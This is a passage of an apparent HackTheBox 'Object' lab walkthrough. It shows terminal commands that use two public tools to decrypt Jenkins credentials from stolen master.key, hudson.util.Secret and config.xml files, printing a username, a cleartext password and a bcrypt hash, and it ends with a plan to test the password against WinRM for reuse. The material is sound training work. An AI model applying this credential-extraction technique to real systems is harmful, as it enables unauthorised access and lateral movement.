Decryption
┌──(kali㉿kali)-[~/…/htb/labs/object/jenkins]
└─$ ll
total 4.1M
4.0k drwxr-xr-x 2 kali kali 4.0k sep 20 19:04 .
4.0k drwxr-xr-x 6 kali kali 4.0k sep 20 17:22 ..
4.0k -rw-r--r-- 1 kali kali 3.2k sep 20 19:04 config.xml
4.0k -rw-r--r-- 1 kali kali 257 sep 20 19:03 master.key
4.0k -rw-r--r-- 1 kali kali 272 sep 20 19:03 hudson.util.Secreti have successfully retrieved all the necessary Jenkins secret files from the target system
This would allow me to finally decrypt the credential of the admin user
jenkins credentials decryptor
While there are a lot of decryption tools available online, Jenkins Credentials Decryptor has the most amount of stars on Github
Compiled binaries are available for download
┌──(kali㉿kali)-[~/…/htb/labs/object/jenkins]
└─$ ./jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml
[
{
"id": "320a60b9-1e5c-4399-8afe-44466c9cde9e",
"password": "c1cdfun_d2434\u0003\u0003\u0003",
"username": "oliver"
}
]Credential decrypted for the admin user
- The
usernamefield is set tooliver- This confirms the speculation made earlier that the
oliveruser is theadminuser
- This confirms the speculation made earlier that the
- The
passwordfield contains 3 Unicode characters at the end- potential decryption error?
Go Decrypt Jenkins
another decryption tool for Jenkins secrets written in GO
┌──(kali㉿kali)-[~/…/htb/labs/object/jenkins]
└─$ ./go-decrypt-jenkins-linux-amd64 -c config.xml -d . -m master.key -s hudson.util.Secret
Searching for files in .
username: oliver
password: c1cdfun_d2434
usernamesecret: false
id: 320a60b9-1e5c-4399-8afe-44466c9cde9e
id: admin
name: admin
passwordhash: #jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoWThis tool certainly seems to be better
While it indeed reveals the oliver user with the password, it also shows the password hash; $2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW
nonetheless, the retrieved credential for the oliver user is admin:c1cdfun_d2434
I will test it against the target WinRM server for password reuse